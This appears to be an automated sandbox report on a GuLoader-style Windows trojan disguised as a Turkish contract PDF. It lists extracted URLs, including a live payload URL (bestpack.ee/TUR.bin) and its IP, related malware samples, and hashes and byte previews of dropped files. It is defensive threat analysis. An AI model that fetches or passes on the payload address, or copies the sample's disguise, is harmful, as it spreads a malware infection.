          https://api.msn.com/sports/blended?market=en-us&satoriid=11ebfe0a-8a02-10e8-c862-80adb116274c&user=mexplorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/travel/news/scientists-finally-solve-mystery-behind-bermuda-triangle-disapexplorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://api.msn.com/sports/blended?market=en-us&satoriid=3e4b6c3b-d87a-8603-8e90-e93f0f328660&user=mexplorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000005.00000000.25110748923.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28293859220.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://financebuzz.com/supplement-income-social-security-55mp?utm_source=msn-money&utm_medium=feed&explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://wallethub.com/edu/best-places-to-retire/6165explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/news/technology/scientists-probed-a-medieval-alchemist-s-artifacts-and-fouexplorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://assets.msn.com/weathermapdata/1/static/background/v2.0/jpg/explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMkZexplorer.exe, 00000005.00000002.28288382307.0000000009091000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://bestpack.ee/TUR.binID#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000002.23631950303.00000000027B8000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13glq1-darkexplorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.pollensense.com/explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://api.msn.com/sports/blended?market=en-us&satoriid=02bde011-1e9d-3aff-8309-7d07d4031798&user=mexplorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://assets.msn.com/weathermapdata/1/static/finance/crypto/icons/Cryptoc2112Image.pngexplorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://bestpack.ee/TUR.binAD#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000002.23631950303.00000000027B8000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/feedexplorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://assets.msn.com/weathermapdata/1/static/weatheexplorer.exe, 00000005.00000000.25106975292.0000000009091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28288382307.0000000009091000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.bestplaces.net/docs/datasource.aspxexplorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/news/politics/pelosi-says-cnn-shouldn-t-air-trump-remarks-on-harris-s-cognexplorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://schemas.microexplorer.exe, 00000005.00000000.25109080586.000000000A2D0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.28290759677.0000000009780000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.25103733309.0000000002D00000.00000002.00000001.00040000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://aka.ms/odirmexplorer.exe, 00000005.00000002.28289278020.0000000009293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25107637245.0000000009293000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA12QGBmexplorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://powerpoint.office.comEM.Wexplorer.exe, 00000005.00000000.25107637245.0000000009395000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28289278020.0000000009395000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/news/us/sen-tuberville-blocks-promotion-of-lloyd-austin-s-top-military-aidexplorer.exe, 00000005.00000002.28288382307.00000000090EE000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/sports/nba/don-t-know-what-to-say-phil-jackson-on-pau-gasol-and-matt-barneexplorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdD#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000001.23351565531.00000000005F2000.00000020.00000001.01000000.00000005.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gU1vexplorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://assets.msn.com/weathermapdata/1/static/finance/crypto/icons/Cryptoc2113Image.pngexplorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://windows.msn.com:443/shell?osLocale=en-US&chosenMarketReason=ImplicitNewexplorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/money/other/elon-musk-says-humans-could-soon-be-heading-to-mars-this-formeexplorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000001.23351565531.0000000000649000.00000020.00000001.01000000.00000005.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://bestpack.ee/TUR.bin7D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000002.23631950303.00000000027B8000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.cntraveler.com/destinations/miami?mbid=synd_msn_rss&utm_source=msn&utm_medium=syndicatioexplorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://api.msn.com/sports/blended?market=en-us&satoriid=ccc6e965-470d-863f-66c1-91cdaa7267c8&user=mexplorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://ocsp.quovadisoffshore.com0D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23536172140.0000000002841000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23436668817.0000000002845000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23536387458.0000000002842000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23535801182.0000000002842000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000002.23632387899.0000000002845000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23535505607.0000000002841000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/money/retirement/middle-aged-americans-are-leaving-work-for-months-years-texplorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/money/markets?id=a33k6hexplorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://wns.windows.com/artexplorer.exe, 00000005.00000003.25842568685.0000000010D72000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.25842218757.0000000010D6E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25115624936.0000000010D78000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28299941018.0000000010D60000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/play/games/mini-golf-saga/cg-9nqhx1w02dprexplorer.exe, 00000005.00000002.28288382307.0000000009091000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://windows.msn.com:443/shellv2?osLocale=en-US&chosenMarketReason=ImplicitNewexplorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/sports/nba/wnba-attendance-record-shattered-as-20-000-watch-caitlin-clark-explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown

          World Map of Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public IPs

          IPDomainCountryFlagASNASN NameMalicious
          185.86.211.137
          		bestpack.eeSpain
          		50129TVHORADADAESfalse

          General Information

          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1518274
          Start date and time:2024-09-25 15:05:09 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 16m 24s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
          Run name:Suspected Instruction Hammering
          Number of analysed new started processes analysed:4
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:2
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe
          Detection:MAL
          Classification:mal96.troj.evad.winEXE@5/9@1/1
          EGA Information:
          • Successful, ratio: 66.7%
          HCA Information:
          • Successful, ratio: 87%
          • Number of executed functions: 59
          • Number of non-executed functions: 291
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

          Warnings

          • Exclude process from analysis (whitelisted): dllhost.exe
          • Report creation exceeded maximum time and may have missing disassembly code information.
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtEnumerateKey calls found.
          • Report size getting too big, too many NtOpenKey calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          • VT rate limit hit for: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe

          Simulations

          Behavior and APIs

          TimeTypeDescription
          09:08:36API Interceptor11340962x Sleep call for process: ipconfig.exe modified

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          185.86.211.137UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
          • bestpack.ee/POL.bin

          Domains

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          bestpack.eeUMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
          • 185.86.211.137

          ASNs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          TVHORADADAESUMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
          • 185.86.211.137
          http://glydesolar.comGet hashmaliciousUnknownBrowse
          • 185.76.79.50
          http://fswcf.orgGet hashmaliciousUnknownBrowse
          • 185.76.79.50
          firmware.sh4.elfGet hashmaliciousUnknownBrowse
          • 185.215.4.10
          nullnet_load.arm.elfGet hashmaliciousMiraiBrowse
          • 156.67.60.67
          mpsl.elfGet hashmaliciousMiraiBrowse
          • 185.204.65.51
          77.90.35.9-skid.mpsl-2024-07-30T06_23_54.elfGet hashmaliciousMirai, MoobotBrowse
          • 156.67.60.67
          0lMevtsZn2.elfGet hashmaliciousMiraiBrowse
          • 156.67.60.35
          205.185.120.123-skid.arm5-2024-07-27T10_33_41.elfGet hashmaliciousMirai, MoobotBrowse
          • 156.67.60.47
          205.185.121.21-mips-2024-07-01T10_13_50.elfGet hashmaliciousMirai, MoobotBrowse
          • 212.231.93.114

          JA3 Fingerprints

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          37f463bf4616ecd445d4a1937da06e19cDErPwSuCB.exeGet hashmaliciousUnknownBrowse
          • 185.86.211.137
          tpq.ps1Get hashmaliciousUnknownBrowse
          • 185.86.211.137
          Kv1tZKstAC.exeGet hashmaliciousUnknownBrowse
          • 185.86.211.137
          z65orderrequest.bat.exeGet hashmaliciousGuLoader, RemcosBrowse
          • 185.86.211.137
          Swift_Copy_401812_301823-30391_#9812_9202938.exeGet hashmaliciousGuLoader, PureLog StealerBrowse
          • 185.86.211.137
          117532123_20240925-9_MCZB#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
          • 185.86.211.137
          UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
          • 185.86.211.137
          CSBls4grBI.exeGet hashmaliciousLummaC, Socks5SystemzBrowse
          • 185.86.211.137
          xNfDl1NeaI.exeGet hashmaliciousRemcos, GuLoaderBrowse
          • 185.86.211.137
          GFqY91CTOZ.htaGet hashmaliciousCobalt Strike, Remcos, GuLoaderBrowse
          • 185.86.211.137

          Dropped Files

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          C:\Users\user\AppData\Local\Temp\nsp919B.tmp\System.dllUMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
            UMOWA_PD.BAT.exeGet hashmaliciousGuLoaderBrowse
              Payment_Advice.1.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                Payment_Advice..exeGet hashmaliciousFormBook, GuLoaderBrowse
                  Payment_Advice..exeGet hashmaliciousGuLoaderBrowse
                    Payment_Advice.1.bat.exeGet hashmaliciousGuLoaderBrowse
                      Payment_Advice..exeGet hashmaliciousGuLoaderBrowse
                        Payment_Advice..exeGet hashmaliciousGuLoaderBrowse
                          Overdoers.exeGet hashmaliciousFormBook, GuLoaderBrowse

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Temp\nsp919B.tmp\System.dll

                            Download File
                            Process:C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):12288
                            Entropy (8bit):5.805604762622714
                            Encrypted:false
                            SSDEEP:192:VjHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZv0QPi:B/Qlt7wiij/lMRv/9V4bvr
                            MD5:4ADD245D4BA34B04F213409BFE504C07
                            SHA1:EF756D6581D70E87D58CC4982E3F4D18E0EA5B09
                            SHA-256:9111099EFE9D5C9B391DC132B2FAF0A3851A760D4106D5368E30AC744EB42706
                            SHA-512:1BD260CABE5EA3CEFBBC675162F30092AB157893510F45A1B571489E03EBB2903C55F64F89812754D3FE03C8F10012B8078D1261A7E73AC1F87C82F714BCE03D
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Joe Sandbox View:
                            • Filename: UMOWA_PD.BAT.exe, Detection: malicious, Browse
                            • Filename: UMOWA_PD.BAT.exe, Detection: malicious, Browse
                            • Filename: Payment_Advice.1.bat.exe, Detection: malicious, Browse
                            • Filename: Payment_Advice..exe, Detection: malicious, Browse
                            • Filename: Payment_Advice..exe, Detection: malicious, Browse
                            • Filename: Payment_Advice.1.bat.exe, Detection: malicious, Browse
                            • Filename: Payment_Advice..exe, Detection: malicious, Browse
                            • Filename: Payment_Advice..exe, Detection: malicious, Browse
                            • Filename: Overdoers.exe, Detection: malicious, Browse
                            Reputation:moderate, very likely benign file
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L...S.d...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\polaritets\Brugerudtalelsen30.Pan

                            Download File
                            Process:C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):350435
                            Entropy (8bit):7.65262084357849
                            Encrypted:false
                            SSDEEP:6144:mKb/u4/ufpUdDwQDQPAVFfRSWT7FvrCeeFDLLyDTn3x/oq289/8jwxQVAvq:3/u4ufpU+yQPcRSWF+xB+L3NoqlW8x9C
                            MD5:9AD9B86B31C31D272945A6FBEE0F02CC
                            SHA1:8801326C827A8136F8FBB3CFEA4A18CF724B7DB3
                            SHA-256:29E6367EA7491895A7886488D1B9728B4175EFB2A565B1A698EB5AE2E7661F5F
                            SHA-512:2F458F6498316512FA1DCDB6A7F337BE8E0E034C9C660B89323C04931D5770FDB4B85C002462287242CD8B71DF6A6DEC7786FA1764EF82D2EEEB560EE3E46514
                            Malicious:false
                            Reputation:low
                            Preview:..WW..1.ZZZZZZZ.p.%..............ffff........... .3....RR..........2...........z...........HHHHHHH....WW...+++........hh..................[[[..............{.......>.....................F.....................;;.........TT...........................|...........b...+..x....#.u..M8.e5.L.*).,..........A.....h- .]N.*.....?......./...=ild|3.4...TgtK...EQ.BY..7z;.}..p..........j%9.:qS...{...G...._F.....&....'f....h..F.....@a..ZV....b>.......HH..6.".2...........D....<..(1..OwC.......f.......:.'.....$.K@.........J..s........m.Ro\...W^...5."A..0.....5f.........+..x....#.u..M8.e5.L.*).,...2C.......6......h- .]N.*.....?......./...=ild|3.4...TgtK...EQ.,.f......%Y..7z;.}..p.j%9.:qS...{...G...._F.........w.C.&....@a..ZV....b>.......HH..6.".2...........D....<..(1..OwC..n..A...f....B......'.....$.K@.........J..s........m.Ro\...W^...5."A..0....f...f.q....+..x....#.u..M8.e5.L.*).,......f.b..A.....h- .]N.*.....?......./...=ild|3.4...TgtK...EQ.BY..7z;.}..p.......f.g

                            C:\Users\user\polaritets\Cronstedtite.Blo187

                            Download File
                            Process:C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):143392
                            Entropy (8bit):4.6129056498521
                            Encrypted:false
                            SSDEEP:1536:Tv6vTAGdJBwl0FwPFn1sya482iCr/F3OeQCWybIFGvMXhgdB0Rz0Ci3/DfeXc:WUgC0aB1PaCiCrxOL+yG0Xe850CkeM
                            MD5:0D2B0FFC862A504CD5D61DD8E1C254F9
                            SHA1:178BF178CAEEFCA4B824F3ACDF0C6A48362C1132
                            SHA-256:F4D66D740C59C00A53D4116541DB7D08B440D38EB993872F143360B0949ED9DC
                            SHA-512:E4177B9D2B5E11AD639F16B044A792230DED1D55B2EF98321C2FC6D7AA13B0BE139075218AF263D1FDA10944FF28F01D97FE0C56DB934F610F97336FC3B007CA
                            Malicious:false
                            Preview:...........C..........nn.............i......5555555..........4....... ....\.......<<.....:::::...........II.....}........\\.PPPPP.....N..y......4...OO.....k.....................|..................................DD......................22222..[[[..p.v..;;;;.............q............................V.....FFFF......T.55......\\\......ll.......:.TTT.....e.'./..F...............//////......y........::......!!....GGG.........o...........................5....33333..999.............9....................gg............LLL.\\.........................k..............6..0...0..HH."......7......U.x.[.................................................p........................=....<........J...........d.I.....................C........&&&&&&....#.~.....""..............vvvvv............@..hh......................ii.........'''.'.'..ff............1....ZZZ.w.......A.............................o......t..............7.KKKK...............###....8.....ggggg....ddddd......................k.............ss........

                            C:\Users\user\polaritets\Observationsposters.tor

                            Download File
                            Process:C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):97664
                            Entropy (8bit):1.2371741628878217
                            Encrypted:false
                            SSDEEP:768:XEFQJPKWWG5ARWTJqBshVmdboj6UJY3VBCwYw2ZDRnv+mRQN:XUE/m2O3N
                            MD5:2B4D5FD79400969869ED030F4803BE99
                            SHA1:163C23302E2DA2B2265A7CD7ED08BE16A3853DCA
                            SHA-256:49C47AAA67085C8B38D02DC0F1F792E83FA17D41CE16927888C9085F530E9DB4
                            SHA-512:7EE103CCCC54B148E7AD62F37FF4ACFC4438436C6F75D15E5248CB19643348C70F2B63062712817002CE4D173E51A7A0C8B3851FCD0FC0D6E1302838909B1C2D
                            Malicious:false
                            Preview:...........4................................................K..............................................W.......................................N........................................................@...5..................o............................................)............................................................~....=.................................................................................2................................................5.........................!....................................f.....k....%..................................................................................H...............%.@....................................(...........$.................V..........................................................6..6...........................................................................|....\................................................_........................y...................................................................6..

                            C:\Users\user\polaritets\drupes.ret

                            Download File
                            Process:C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):244138
                            Entropy (8bit):1.252663089946015
                            Encrypted:false
                            SSDEEP:768:cv49C5wBVa5O2Fx8p7KLOTSo3NTuAG15VTvfAX+H7v+uQVsfpqSC26Pn6DD/SNsg:JBQxurv96jREO3X2r
                            MD5:BBD77A921062C9B6CBF4BEDFF50E1514
                            SHA1:C25712C5F69E016A364E8898B59E7229E3C5E7A4
                            SHA-256:E2882B3589FF6D9FA79AC2D88FC8DE8FD94BA046E8B9796203A4916C73731EAD
                            SHA-512:9BDFC20EFFD587EC19B524E36D392F4863C8242C8D4C8C7F81164A0E0DF84C5BF1633400873D0F68C40079113F9F2568706642334FCFDCCE4C6E0B1D7D5FB660
                            Malicious:false
                            Preview:....'........................`............Z......`.................................$..................S........J.........................................................................................................................................................................-........................N....E.......................y.........................................A..........k.............................2...............................%.........................................P.........................................e........................w.....................p.........................o.......................................F........)........................................~................................................................u.....................................................<...............................}.9......................^.................c.................A..............O.........................................................................|.

                            C:\Users\user\polaritets\quodlibetic.fes

                            Download File
                            Process:C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):438128
                            Entropy (8bit):1.2562406175237242
                            Encrypted:false
                            SSDEEP:1536:zN/79C7p5KmH/e6grFLDiN8w27kdDZK5M9aR:hyp5K4e6kFLoMV
                            MD5:E883CEF7CF2793E15A52C9BAC1CDE472
                            SHA1:1D4973110569354FA072BA3AFF0BD21EA0DF109A
                            SHA-256:2FF67336CFEEE418E565B0C79855927FC0CD0B1E9F2F40A59F1CB7EF2328635A
                            SHA-512:372BE015C3FA19C0EEAA981803900CA088B92188187A69697EEE808068F8033225BFD2927E2DB54EABEECAC05A421DC6CCCABFE19F39788B4F6D4E6F80CE04A5
                            Malicious:false
                            Preview:......q......y........................".........................................-....................................................n#............................Jj.........................................................................w.........................$................................................................i.............j.....K...................*.........................................=.........i..........0........~............................[......./.........,........Y.................~..............................................!.......w....................t....................F.......`........................................c.......................j................................................................................................".......................................<..............{..?.J............v........................................................................................................+..................+..................

                            C:\Users\user\polaritets\roere.hid

                            Download File
                            Process:C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):15722
                            Entropy (8bit):1.1774803541140593
                            Encrypted:false
                            SSDEEP:96:QlmaSsDp47EcNFpMw8GM4Zq+AUUnPMN61WN1:QbSc47/lv8n4Zq+AUQmy4
                            MD5:A8FD81B22FDC76D0AAE4ABF40CC1E8F4
                            SHA1:ECA25609E68636E12C3AB63D7E9F1B7717CE450A
                            SHA-256:13148F74A847C0F474385F1E62C01A5065700A472BF689D7299D3F420A7CC45D
                            SHA-512:7E0CE6444E0F402278704066AE74F442684B80959CB90CFABA6A3BBCA1EB754EEBCDE11A61FE17D8DE1F708F035BDC2C7825BF9E8F92D761CE0E78BA68544C6B
                            Malicious:false
